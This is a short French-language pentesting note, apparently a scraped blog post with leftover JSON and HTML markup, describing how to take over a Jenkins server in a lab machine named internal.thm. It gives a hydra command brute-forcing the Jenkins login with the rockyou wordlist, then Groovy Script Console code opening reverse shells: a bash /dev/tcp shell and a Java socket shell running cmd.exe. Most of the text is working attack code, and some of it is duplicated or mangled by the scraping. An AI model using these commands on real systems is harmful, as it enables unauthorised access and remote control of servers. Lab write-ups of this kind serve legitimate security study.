On peut tenter de trouver le mot de passe de Jenkins. On intercepte une requ\u00eate de connexion dans burp<\/p>\n
On utilise hydra<\/p>\n
Jenkins\/Manage Jenkins\/Script Console et on ex\u00e9cute le code pour obtenir un shell avec les privil\u00e8ges du service<\/p>\n Sur windows, voici un script groovy fonctionnel pour la console On peut tenter de trouver le mot de passe de Jenkins. On intercepte une requ\u00eate de connexion dans burp On utilise hydra hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt internal.thm -s 8888 http-post-form "\/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" Jenkins\/Manage Jenkins\/Script Console r = Runtime.getRuntime() p = r.exec( as String) p.waitFor() et on ex\u00e9cute le code pour obtenir un shell avec les privil\u00e8ges du service Sur windows, voici un script groovy fonctionnel pour la console String host="10.9.0.24"; int port=5555; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"yoast_head":"\nhydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt internal.thm -s 8888 http-post-form "\/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"<\/code><\/p>\n
\n\nr = Runtime.getRuntime()\np = r.exec(["\/bin\/bash","-c","exec 5<>\/dev\/tcp\/10.9.0.60\/9999;cat <&5 | while read line; do \\$line 2>&5 >&5; done"] as String[])\np.waitFor()\n<\/code><\/pre><\/p>\n
\nString host="10.9.0.24";\nint port=5555;\nString cmd="cmd.exe";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"